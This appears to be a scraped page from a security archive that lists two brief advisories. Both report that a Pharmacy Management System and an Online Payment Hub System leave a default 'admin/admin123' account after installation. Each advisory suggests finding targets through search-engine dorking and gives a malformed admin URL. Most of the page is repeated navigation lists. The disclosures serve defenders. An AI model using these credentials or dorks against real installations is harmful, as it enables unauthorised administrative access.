*   Exploit (53,083)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,179)
*   Local (14,782)
*   Magazine (586)
*   Overflow (13,153)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,618)
*   Root (3,625)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,023)
*   Shell (3,272)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,589)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,911)
*   Web (9,949)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,556)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,418)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,700)
*   UNIX (9,431)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Prison Management System version 1.0 Insecure Settings

Pharmacy Management System version 1.0 suffers from an ignored default credential vulnerability.

**Pharmacy Management System 1.0 Insecure Settings**

Posted Jul 29, 2024

Authored by indoushka

Pharmacy Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 59f44c9b7f06be4efb67d80c7c07d536ce29ef1457664c97c77dea0949148078

Download | Favorite | View

**Pharmacy Management System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Pharmacy Management System v1.0 Insecure Settings Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/user/257130/activity                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clientsGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,161)
*   Arbitrary (16,833)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,780)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (25,014)
*   Encryption (2,389)
*   Exploit (53,083)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,179)
*   Local (14,782)
*   Magazine (586)
*   Overflow (13,153)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,618)
*   Root (3,625)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,023)
*   Shell (3,272)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,589)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,911)
*   Web (9,949)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,556)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,418)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,700)
*   UNIX (9,431)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Pharmacy Management System 1.0 Insecure Settings

Online Payment Hub System version 1.0 suffers from an ignored default credential vulnerability.

**Online Payment Hub System 1.0 Insecure Settings**

Posted Jul 29, 2024

Authored by indoushka

Online Payment Hub System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 30a6b1cbf6e4c838b1c70e5f65c51d228a564e5d1e6f1bc286e2c364b4ee5cda

Download | Favorite | View

**Online Payment Hub System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Online Payment Hub System v1.0 Insecure Settings Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://scriptmafia.org                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yoruban-witness.000webhostappcom/admin/?page=clientsGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,161)
*   Arbitrary (16,833)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,780)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (25,014)
*   Encryption (2,389)
*   Exploit (53,083)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,179)
*   Local (14,782)
*   Magazine (586)
*   Overflow (13,153)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,618)
*   Root (3,625)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,023)
*   Shell (3,272)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,589)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,911)
*   Web (9,949)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,556)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,418)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,700)
*   UNIX (9,431)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Tag

#debian